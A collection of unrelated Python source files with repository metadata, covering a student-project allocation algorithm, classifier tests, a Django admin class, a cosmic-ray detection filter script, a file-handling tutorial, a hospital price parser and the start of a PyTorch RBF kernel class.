tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
import library
import random
import re
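# Overview: allocate() performs a student-project allocation. It repeatedly takes an
# unassigned student who still has projects on their preference list and assigns them
# to their first remaining choice. Whenever a project or lecturer exceeds its capacity
# the worst-ranked assigned student is bumped back into the unassigned pool, and once
# a project or lecturer becomes exactly full, strictly worse-ranked students are pruned
# from the relevant preference lists. random_distribute() and topic_distribute() then
# place any leftover students onto projects that still have free capacity, either at
# random or by preferred topic (project code prefixes I/O/P/M).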
def allocate(studPrefs,unassignedStudents,lecturerprefs,projLects,lectProjs,lecturercaps,projCaps,randomise,updates,iterationLimit):
# Create projected preference list - first pass; add students not on lecturer's list
for k, v in studPrefs.items():
for project in v:
idx = library.firstidx(lecturerprefs[projLects[project]],k)
if idx == -1:
lecturerprefs[projLects[project]].append(k)
projectedPrefs = {}
# Create projected preference list - second pass; add students to projected list
for k, v in projLects.items():
for student in lecturerprefs[v]:
if library.firstidx(studPrefs[student], k) > -1:
if k not in projectedPrefs:
projectedPrefs.update({k: []})
projectedPrefs[k].append(student)
else:
projectedPrefs[k].append(student)
maxidx = 0
done = 0
iters = 0
projAssignments = dict()
lectAssignments = dict()
studAssignments = dict()
nProj = 0
currentStudent = ""
while done != 1:
iters += 1
if randomise == 1:
random.shuffle(unassignedStudents)
        if iters > iterationLimit and iterationLimit != -1:
            print("Reached the maximum number of iterations ("+str(iterationLimit)+") before convergence")
done = 1
if len(unassignedStudents) > 0:
for value in unassignedStudents:
currentStudent = value
nProj = len(studPrefs[currentStudent])
if nProj > 0:
break
            if nProj > 0: ### We have a student who still has projects in their list - heart of the algorithm
currentProject = studPrefs[currentStudent][0]
currentLecturer = projLects[currentProject]
if currentProject not in projAssignments:
projAssignments.update({currentProject:[]})
projAssignments[currentProject].append(currentStudent)
else:
projAssignments[currentProject].append(currentStudent)
if currentLecturer not in lectAssignments:
lectAssignments.update({currentLecturer:[]})
lectAssignments[currentLecturer].append(currentStudent)
else:
lectAssignments[currentLecturer].append(currentStudent)
studAssignments.update({currentStudent:currentProject})
idx = library.firstidx(unassignedStudents,currentStudent)
unassignedStudents.pop(idx)
if updates == True:
print(str(iters)+" : Assigned "+currentStudent+" to project "+currentProject+" with supervisor "+currentLecturer+"\n")
#Is the project the student was just assigned to overloaded?
if len(projAssignments[currentProject]) > int(projCaps[currentProject]):
maxidx = -1
for value in projAssignments[currentProject]:
idx = library.firstidx(projectedPrefs[currentProject], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Project " + currentProject + " is overloaded. Removing " + worst + ".\n")
idx = library.firstidx(lectAssignments[currentLecturer],worst)
lectAssignments[currentLecturer].pop(idx)
idx = library.firstidx(projAssignments[currentProject],worst)
projAssignments[currentProject].pop(idx)
if worst not in unassignedStudents:
unassignedStudents.append(worst)
if worst in studAssignments:
studAssignments.pop(worst)
#Is the lecturer of the project the student was just assigned to overloaded?
if len(lectAssignments[currentLecturer]) > int(lecturercaps[currentLecturer]):
maxidx = -1
for value in lectAssignments[currentLecturer]:
idx = library.firstidx(lecturerprefs[currentLecturer],value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Lecturer " + currentLecturer + " is overloaded. Removing " + worst + ".\n")
idx = library.firstidx(lectAssignments[currentLecturer], worst)
lectAssignments[currentLecturer].pop(idx)
if worst in studAssignments:
idx = library.firstidx(projAssignments[studAssignments[worst]], worst)
projAssignments[studAssignments[worst]].pop(idx)
if worst not in unassignedStudents:
unassignedStudents.append(worst)
if worst in studAssignments:
studAssignments.pop(worst)
#Is the project full?
if len(projAssignments[currentProject]) == int(projCaps[currentProject]):
maxidx = -1
for value in projAssignments[currentProject]:
idx = library.firstidx(projectedPrefs[currentProject], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Project "+currentProject+" is full: removing successors to "+worst)
idx = library.firstidx(projectedPrefs[currentProject],worst)
a = []
if idx == -1 or idx == len(projectedPrefs[currentProject])-1:
pass
else:
for i in range(idx+1,len(projectedPrefs[currentProject])):
a.append(projectedPrefs[currentProject][i])
for i in a:
while True:
idx = library.firstidx(studPrefs[i],currentProject)
if idx > -1:
studPrefs[i].pop(idx)
if idx == -1:
break
#Is the lecturer full?
if len(lectAssignments[currentLecturer]) == int(lecturercaps[currentLecturer]):
maxidx = -1
for value in lectAssignments[currentLecturer]:
idx = library.firstidx(lecturerprefs[currentLecturer], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Lecturer "+currentLecturer+" is full: removing successors to "+worst+"\n")
idx = library.firstidx(lecturerprefs[currentLecturer],worst)
a = []
if idx == -1 or idx == len(lecturerprefs[currentLecturer])-1:
pass
else:
for i in range(idx+1,len(lecturerprefs[currentLecturer])):
a.append(lecturerprefs[currentLecturer][i])
for i in a:
for project in lectProjs[currentLecturer]:
while True:
idx = library.firstidx(projectedPrefs[project], i)
if idx > -1:
projectedPrefs[project].pop(idx)
if idx == -1:
break
while True:
idx = library.firstidx(studPrefs[i],project)
if idx > -1:
studPrefs[i].pop(idx)
if idx == -1:
break
if updates == True:
print(str(iters)+": Remaining students:" + str(unassignedStudents)+"\n-------------\n")
else:
done= 1
else:
done= 1
return {"Student Assignments":studAssignments, "Lecturer Assignments": lectAssignments, "Project Assignments": projAssignments, "Unassigned Students": unassignedStudents}
def random_distribute(unassignedStudents,studAssignments,projAssignments,projCaps,lectAssignments,lecturercaps, lectProjs, projLects, updates):
freeprojects = []
unassignedStudentsCopy = unassignedStudents
freeprojects = library.findFreeProjects(projAssignments, projCaps, lectAssignments, lecturercaps, lectProjs)
if updates == True:
print("***Distributing remaining "+str(len(unassignedStudents))+" students***\n")
if updates == True and len(unassignedStudents) <= len(freeprojects):
print(str(
len(freeprojects)) + " projects are available. All remaining students will be randomly allocated a project\n")
elif updates == True and len(freeprojects) < len(unassignedStudents):
diff = len(unassignedStudents) - len(freeprojects)
print(
str(len(freeprojects)) + " projects are available. " + str(diff) + " students will not be assigned to projects\n")
for student in unassignedStudentsCopy:
if len(freeprojects) > 0:
thisproject = random.choice(freeprojects)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
if updates:
print("Student "+student+" has been allocated to project "+thisproject+" with lecturer "+thislecturer)
studAssignments.update({student:thisproject})
freeprojects.pop(0)
for student in studAssignments:
if student in unassignedStudents:
unassignedStudents.remove(student)
return{"Student Assignments": studAssignments, "Lecturer Assignments":lectAssignments, "Project Assignments":projAssignments, "Unassigned Students": unassignedStudents}
def topic_distribute(unassignedStudents,studTopicPrefs,studAssignments,projAssignments,projCaps,lectAssignments,lecturercaps, projLects, lectProjs, updates):
freeprojects = []
unassignedStudentsCopy = unassignedStudents
freeprojects = library.findFreeProjects(projAssignments, projCaps, lectAssignments, lecturercaps, lectProjs)
if updates == True:
print("***Distributing remaining " + str(len(unassignedStudents)) + " students***\n")
    if updates == True and len(freeprojects) < len(unassignedStudents):
        diff = len(unassignedStudents) - len(freeprojects)
        print(
            str(len(
                freeprojects)) + " projects are available. " + str(diff) + " students will not be assigned to projects\n")
inorgfree = []
orgfree = []
medfree = []
physfree = []
for project in freeprojects:
if re.match("I[A-Z][0-9][0-9]", project) is not None:
inorgfree.append(project)
if re.match("O[A-Z][0-9][0-9]", project) is not None:
orgfree.append(project)
if re.match("P[A-Z][0-9][0-9]", project) is not None:
physfree.append(project)
if re.match("M[A-Z][0-9][0-9]", project) is not None:
medfree.append(project)
for student in unassignedStudentsCopy:
print("Assigning student "+student)
if len(freeprojects) > 0:
print("There are "+str(len(freeprojects))+" projects remaining")
for topic in studTopicPrefs[student]:
print("Currently looking for an "+topic+" project")
if topic == "I" and len(inorgfree) > 0:
print("Found I")
thisproject = random.choice(inorgfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
inorgfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print("Allocated "+student+" to project "+thisproject+" with lecturer "+ thislecturer+"\n")
break
if topic == "O" and len(orgfree) > 0:
print("Found O")
thisproject = random.choice(orgfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
orgfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
if topic == "P" and len(physfree) > 0:
print("Found P")
thisproject = random.choice(physfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
physfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
if topic == "M" and len(medfree) > 0:
print("Found M")
thisproject = random.choice(medfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
medfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
for student in studAssignments:
if student in unassignedStudents:
unassignedStudents.remove(student)
#random.shuffle(unassignedStudentsCopy)
return{"Student Assignments": studAssignments, "Lecturer Assignments":lectAssignments, "Project Assignments":projAssignments, "Unassigned Students": unassignedStudents}
| 38.53406 | 172 | 0.680031 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,979 | 0.139938 |
f1f067f028748782da40d03c616d1804024a0dea
| 3,271 |
py
|
Python
|
tests/models/classifiers/test_logistic.py
|
harmsm/epistasis
|
741b25b3e28015aeeba8d4efc94af1e1d811cd63
|
[
"Unlicense"
] | null | null | null |
tests/models/classifiers/test_logistic.py
|
harmsm/epistasis
|
741b25b3e28015aeeba8d4efc94af1e1d811cd63
|
[
"Unlicense"
] | null | null | null |
tests/models/classifiers/test_logistic.py
|
harmsm/epistasis
|
741b25b3e28015aeeba8d4efc94af1e1d811cd63
|
[
"Unlicense"
] | 2 |
2020-04-02T00:58:24.000Z
|
2021-11-16T13:30:30.000Z
|
import pytest
# External imports
import numpy as np
from gpmap import GenotypePhenotypeMap
# Module to test
import epistasis
from epistasis.models.classifiers import *
THRESHOLD = 0.2
@pytest.fixture
def gpm(test_data):
"""
Create a genotype-phenotype map
"""
d = test_data[0]
return GenotypePhenotypeMap(genotype=d["genotype"],
phenotype=d["phenotype"],
wildtype=d["wildtype"])
def test_init(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
# Tests
assert model.order == 1
assert model.model_type == "local"
def test_fit(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
assert hasattr(model, "classes")
assert hasattr(model, "epistasis")
assert hasattr(model, "coef_")
def test_predict(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
ypred = model.predict()
assert len(ypred) == model.gpm.num_genotypes
def test_predict_proba(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
probs = model.predict_proba()
# check probs is the right length
assert len(probs) == model.gpm.num_genotypes
# Check probs are between 0 and 1
assert np.all(probs <= 1)
assert np.all(probs >= 0)
def test_predict_log_proba(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
probs = model.predict_log_proba()
# check probs is the right length
assert len(probs) == model.gpm.num_genotypes
# Check log probs are less than or equal to 0
assert np.all(probs <= 0)
def test_score(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
score = model.score()
# Test score is between 0 and 1
assert 0 <= score <= 1
def test_thetas(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
# Check thetas is the correct length
assert len(model.thetas) == len(model.coef_[0])
def test_hypothesis(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
# these should be equal if working properly
pred = model.predict_proba()[:, 0]
hypo = model.hypothesis()
#np.testing.assert_almost_equal(pred, hypo)
def test_lnlikelihood(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
lnlike = model.lnlikelihood()
# Check we get a float
assert lnlike.dtype == float
| 27.258333 | 60 | 0.61174 | 0 | 0 | 0 | 0 | 284 | 0.086824 | 0 | 0 | 535 | 0.163559 |
f1f07ae2628711dd9b1d256f9780dc722c6f8e53
| 381 |
py
|
Python
|
backend/notifications/admin.py
|
solitariaa/CMPUT404-project-socialdistribution
|
f9e23a10e209f8bf7ed062e105f44038751f7c74
|
[
"W3C-20150513"
] | 1 |
2022-03-01T03:03:40.000Z
|
2022-03-01T03:03:40.000Z
|
backend/notifications/admin.py
|
solitariaa/CMPUT404-project-socialdistribution
|
f9e23a10e209f8bf7ed062e105f44038751f7c74
|
[
"W3C-20150513"
] | 51 |
2022-02-09T06:18:27.000Z
|
2022-03-28T19:01:54.000Z
|
backend/notifications/admin.py
|
solitariaa/CMPUT404-project-socialdistribution
|
f9e23a10e209f8bf7ed062e105f44038751f7c74
|
[
"W3C-20150513"
] | 2 |
2022-03-13T20:58:10.000Z
|
2022-03-19T06:29:56.000Z
|
from django.contrib import admin
from .models import Notification
class NotificationAdmin(admin.ModelAdmin):
ordering = ('published',)
    search_fields = ('author__displayName',)  # search_fields must reference model field lookups, not a callable
list_display = ('id', 'get_author', 'published', 'summary')
def get_author(self, obj: Notification):
return obj.author.displayName
admin.site.register(Notification, NotificationAdmin)
| 23.8125 | 63 | 0.727034 | 257 | 0.674541 | 0 | 0 | 0 | 0 | 0 | 0 | 59 | 0.154856 |
f1f2709a9b0d54f4549f4f5b2c964cce095a32f9
| 3,655 |
py
|
Python
|
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | 3 |
2020-06-19T15:41:19.000Z
|
2020-06-29T12:47:05.000Z
|
import bz2
import time
import urllib.request
import io
from typing import List, Tuple
from credo_cf import load_json_from_stream, progress_and_process_image, group_by_device_id, group_by_resolution, too_often, near_hot_pixel2, \
too_bright
from credo_cf import xor_preprocess
from credo_cf.commons.utils import get_and_add
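# Pipeline overview: download (or load) a working set of detections, group them by
# device id and image resolution, then filter each group with too_often, too_bright,
# an XOR preprocessing step and near_hot_pixel2, counting how many detections each
# filter rejects and how long each stage takes.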
WORKING_SET = 'http://mars.iti.pk.edu.pl/~nkg/credo/working_set.json.bz2'
time_profile = {}
def download_working_set(url: str) -> Tuple[List[dict], int]:
print('Download working set...')
data = urllib.request.urlopen(url).read()
print('Decompress...')
json_content = bz2.decompress(data).decode("utf-8")
    print('Parse JSON...')
objs, count, errors = load_json_from_stream(io.StringIO(json_content), progress_and_process_image)
print('Parsed %d, skipped %d' % (count, count - len(objs)))
return objs, count
def start_analyze(all_detections):
# print('Make custom grayscale conversion...')
# for d in all_detections:
# convert_to_gray(d)
ts_load = time.time()
print('Group by devices...')
by_devices = group_by_device_id(all_detections)
get_and_add(time_profile, 'grouping', time.time() - ts_load)
drop_counts = {}
leave_good = 0
print('Run experiment...')
dev_no = 0
dev_count = len(by_devices.keys())
for device_id, device_detections in by_devices.items():
ts_load = time.time()
by_resolution = group_by_resolution(device_detections)
get_and_add(time_profile, 'grouping', time.time() - ts_load)
for resolution, detections in by_resolution.items():
dev_no += 1
            print('Start device %d of %d, detections count: %d' % (dev_no, dev_count, len(detections)))
# too_often
ts_load = time.time()
goods = detections
bads, goods = too_often(goods)
get_and_add(drop_counts, 'too_often', len(bads))
get_and_add(time_profile, 'too_often', time.time() - ts_load)
# too_bright
ts_load = time.time()
bads, goods = too_bright(goods, 70, 70)
get_and_add(time_profile, 'too_bright', time.time() - ts_load)
get_and_add(drop_counts, 'too_bright', len(bads))
# xor filter
ts_load = time.time()
if len(goods) > 1:
x_or = xor_preprocess(goods)
get_and_add(time_profile, 'xor', time.time() - ts_load)
# near_hot_pixel2
ts_load = time.time()
bads, goods = near_hot_pixel2(goods)
get_and_add(time_profile, 'near_hot_pixel2', time.time() - ts_load)
get_and_add(drop_counts, 'drop_near_hot_pixel2', len(bads))
# end, counting goods
leave_good += len(goods)
print('\nCount of cut off by filters:')
for f, v in drop_counts.items():
print('%s: %d' % (f, v))
print('Goods: %d' % leave_good)
def main():
# config data source, please uncomment and use one from both
ts_load = time.time()
# choice 1: download from website
working_sets = [download_working_set(WORKING_SET)] # download our working set from our hosting
# choice 2: load from files
# file_names = ['working_set.json']
# working_sets = [load_json(fn, progress_and_process_image) for fn in file_names]
get_and_add(time_profile, 'load', time.time() - ts_load)
for all_detections, count in working_sets:
start_analyze(all_detections)
print('\nTime count:')
for ts, tv in time_profile.items():
print('time: %03d - %s' % (int(tv), ts))
if __name__ == '__main__':
main()
| 31.782609 | 142 | 0.642681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 885 | 0.242134 |
f1f2862dcb680020685252fc0444e7b7a36ac2b8
| 427 |
py
|
Python
|
apptweak/ios.py
|
gudhati/apptweak-api-python-library
|
f4a7f7e34548d6d216f3a297d63944c7adbf9667
|
[
"MIT"
] | 5 |
2019-05-21T14:44:57.000Z
|
2020-10-30T04:08:13.000Z
|
apptweak/ios.py
|
gudhati/apptweak-api-python-library
|
f4a7f7e34548d6d216f3a297d63944c7adbf9667
|
[
"MIT"
] | 1 |
2020-08-28T02:42:37.000Z
|
2020-08-28T07:52:54.000Z
|
apptweak/ios.py
|
gudhati/apptweak-api-python-library
|
f4a7f7e34548d6d216f3a297d63944c7adbf9667
|
[
"MIT"
] | 5 |
2019-07-18T13:38:01.000Z
|
2021-06-09T04:12:35.000Z
|
from apptweak.plateform import *
class Ios(Plateform):
plateform_name = 'ios'
def __init__(self):
super().__init__(self.plateform_name)
@classmethod
def ratings(self, application_id, params = {}):
return self.applications(application_id, API_END_PATH['ratings'], params)
@classmethod
def backlinks(self, application_id):
        raise Exception('Not implemented for this platform')
| 26.6875 | 81 | 0.697892 | 392 | 0.918033 | 0 | 0 | 261 | 0.611241 | 0 | 0 | 50 | 0.117096 |
f1f2f70605379c3a09598bf2b8739bb4f47caa1b
| 3,944 |
py
|
Python
|
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
print('---------- Opening Files for Reading ----------')
f = open('./files/reading_file_example.txt')
print(f) # <_io.TextIOWrapper name='./files/reading_file_example.txt' mode='r' encoding='cp936'>
print('\t---------- read() ----------')
# read(): read the whole text as string. If we want to limit the number of characters we read,
# we can limit it by passing int value to the methods.
f = open('./files/reading_file_example.txt')
txt = f.read()
print(type(txt)) # <class 'str'>
print(txt) # Hello,Python!
f.close()
f = open('./files/reading_file_example.txt')
txt = f.read(5)
print(type(txt)) # <class 'str'>
print(txt) # Hello
f.close()
print('\t---------- readline(): read only the first line ----------')
f = open('./files/reading_file_example.txt')
line = f.readline()
print(type(line)) # <class 'str'>
print(line) # Hello,Python!
f.close()
print('\t---------- readlines(): read all the text line by line and returns a list of lines ----------')
f = open('./files/reading_file_example.txt')
lines = f.readlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
f.close()
print('\t---------- splitlines() ----------')
f = open('./files/reading_file_example.txt')
lines = f.read().splitlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
f.close()
print('\t---------- Another way to close a file ----------')
with open('./files/reading_file_example.txt') as f:
lines = f.read().splitlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
print('---------- Opening Files for Writing and Updating ----------')
# To write to an existing file, we must add a mode as parameter to the open() function:
# "a" - append - will append to the end of the file, if the file does not exist it raise FileNotFoundError.
# "w" - write - will overwrite any existing content, if the file does not exist it creates.
with open('./files/writing_file_example.txt', 'a') as f:
f.write('Hello,Python!')
with open('./files/writing_file_example.txt', 'w') as f:
f.write('Hello,Java!')
print('---------- Deleting Files ----------')
import os
if os.path.exists('./files/writing_file_example.txt'):
os.remove('./files/writing_file_example.txt')
else:
    print('The file does not exist!')
print('---------- File Types ----------')
print('\t---------- File with json Extension ----------')
# dictionary
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
# JSON: A string form of a dictionary
person_json = "{'name': 'Zhang San', 'country': 'China', 'city': 'Hangzhou', 'skills': ['Java', 'C#', 'Python']}"
# we use three quotes and make it multiple line to make it more readable
person_json = '''{
"name":"Zhang San",
"country":"China",
"city":"Hangzhou",
"skills":["Java", "C#","Python"]
}'''
print('\t---------- Changing JSON to Dictionary ----------')
import json
person_json = '''{
"name":"Zhang San",
"country":"China",
"city":"Hangzhou",
"skills":["Java", "C#","Python"]
}'''
person_dct = json.loads(person_json)
print(person_dct)
print(person_dct['name'])
print('\t---------- Changing Dictionary to JSON ----------')
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
person_json = json.dumps(person_dct, indent=4) # indent could be 2, 4, 8. It beautifies the json
print(type(person_json)) # <class 'str'>
print(person_json)
print('\t---------- Saving as JSON File ----------')
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
with open('./files/json_example.json', 'w', encoding='utf-8') as f:
json.dump(person_dct, f, ensure_ascii=False, indent=4)
print('\t---------- File with csv Extension ----------')
import csv
# with open('./files/csv_example.csv') as f:
| 31.806452 | 113 | 0.606491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,681 | 0.679767 |
f1f6211abde32ba71ccaac35e7c39eb9935dfa7c
| 2,491 |
py
|
Python
|
data/grady-memorial-hospital/parse.py
|
Afellman/hospital-chargemaster
|
1b87bc64d95d97c0538be7633f9e469e5db624e2
|
[
"MIT"
] | 34 |
2019-01-18T00:15:58.000Z
|
2022-03-26T15:01:08.000Z
|
data/grady-memorial-hospital/parse.py
|
wsheffel/hospital-chargemaster
|
b3473c798fd2f343f7f02c1e32496f9eea9fa94d
|
[
"MIT"
] | 8 |
2019-01-16T22:06:11.000Z
|
2019-02-25T00:59:25.000Z
|
data/grady-memorial-hospital/parse.py
|
wsheffel/hospital-chargemaster
|
b3473c798fd2f343f7f02c1e32496f9eea9fa94d
|
[
"MIT"
] | 10 |
2019-02-20T14:58:16.000Z
|
2021-11-22T21:57:04.000Z
|
#!/usr/bin/env python
import os
from glob import glob
import json
import pandas
import datetime
import sys
from zipfile import ZipFile
here = os.path.dirname(os.path.abspath(__file__))
folder = os.path.basename(here)
latest = '%s/latest' % here
year = datetime.datetime.today().year
output_data = os.path.join(here, 'data-latest.tsv')
output_year = os.path.join(here, 'data-%s.tsv' % year)
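# Flatten the latest scraped chargemaster records for this hospital into TSV:
# read latest/records.json, parse each referenced price file, and write
# data-latest.tsv plus a year-stamped copy.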
# Read a zip archive into memory, returning {member name: file bytes}
def extract_zip(input_file):
input_zip = ZipFile(input_file)
return {name: input_zip.read(name) for name in input_zip.namelist()}
# Don't continue if we don't have latest folder
if not os.path.exists(latest):
print('%s does not have parsed data.' % folder)
sys.exit(0)
# Don't continue if we don't have results.json
results_json = os.path.join(latest, 'records.json')
if not os.path.exists(results_json):
print('%s does not have results.json' % folder)
sys.exit(1)
with open(results_json, 'r') as filey:
results = json.loads(filey.read())
columns = ['charge_code',
'price',
'description',
'hospital_id',
'filename',
'charge_type']
df = pandas.DataFrame(columns=columns)
for result in results:
filename = os.path.join(latest, result['filename'])
if not os.path.exists(filename):
print('%s is not found in latest folder.' % filename)
continue
if os.stat(filename).st_size == 0:
print('%s is empty, skipping.' % filename)
continue
contents = None
if filename.endswith('txt'):
# ['DESCRIPTION', 'Unnamed: 1', 'PRICE']
contents = pandas.read_csv(filename)
contents = contents.dropna(how='all')
print("Parsing %s" % filename)
print(contents.head())
# Update by row
for row in contents.iterrows():
idx = df.shape[0] + 1
price = row[1]['PRICE'].replace('$','').replace(',','').strip()
entry = [None, # charge code
price, # price
row[1]["DESCRIPTION"], # description
result['hospital_id'], # hospital_id
result['filename'],
'standard'] # filename
df.loc[idx,:] = entry
# Remove empty rows
df = df.dropna(how='all')
# Save data!
print(df.shape)
df.to_csv(output_data, sep='\t', index=False)
df.to_csv(output_year, sep='\t', index=False)
| 29.654762 | 75 | 0.583701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 643 | 0.258129 |
f1f62ac7868b351e283f53daaf44f5e2562dfc27
| 10,476 |
py
|
Python
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | 6 |
2021-12-13T14:30:31.000Z
|
2022-01-24T07:54:57.000Z
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | 10 |
2021-12-18T23:04:53.000Z
|
2022-02-05T02:06:34.000Z
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 10 07:20:39 2022
@author: maout
"""
import numpy as np
from scipy.spatial.distance import cdist
import torch
#from score_function_estimators import my_cdist
from typing import Union
from torch.autograd import grad
#%% select available device
def set_device():
device = "cuda" if torch.cuda.is_available() else "cpu"
if device != "cuda":
print("GPU is not enabled in this notebook. \n"
"If you want to enable it, in the menu under `Runtime` -> \n"
"`Hardware accelerator.` and select `GPU` from the dropdown menu")
else:
print("GPU is enabled in this notebook. \n"
"If you want to disable it, in the menu under `Runtime` -> \n"
"`Hardware accelerator.` and select `None` from the dropdown menu")
return device
#%%
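# The class below implements the standard Gaussian RBF kernel
#   k(x, y) = signal_variance * exp(-0.5 * sum_d (x_d - y_d)^2 / length_scale_d^2)
# with either one shared lengthscale or a separate lengthscale per input dimension.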
class RBF(object):
"""
Class for implementing a Gaussian RBF kernel in pytorch.
Attributes
----------
length_scale : float or list or numpy.array
        Length scale of the kernel. Either a single float for one shared
        lengthscale across all dimensions, or a vector of floats with a
        different lengthscale per dimension. Default is 1.0.
    signal_variance : float, optional
        This is not used yet. The default is 1.0.
device : Union[bool,str], optional
Selected device where the computations will be executed,i.e. cpu or gpu.
The default is None, which executes calculations on the cpu.
multil : Union[bool, None], optional
Boolean indicator determining whether lengthscale is a vector or a
single value. The default is False.
K_data : numpy.ndarray
Storage for the evaluation of the kernel on the datapoints (X, Y)
in order to be reused in the calculations of the gradient of the Kernel.
Methods
-------
Kernel(X, Y):
        Computes the kernel for the inputs X and Y. Stores and returns
the result at K_data. Input arrays are of dimensionality (N, D) and
(M, D) respectively. Resulting Kernel has (N, M) dimension.
gradient_X(X, Y):
        Computes the gradient of the kernel with respect to the first argument
along all D dimensions.
"""
def __init__(self, length_scale: Union[float, torch.tensor, np.ndarray]=1.0, signal_variance: float=1.0, device: Union[bool,str]=None, multil: Union[bool, None]=False) -> None:
"""
Initialising function for RBF Gaussian kernels using pytorch.
Creates an object with necessary parammeters.
Parameters
----------
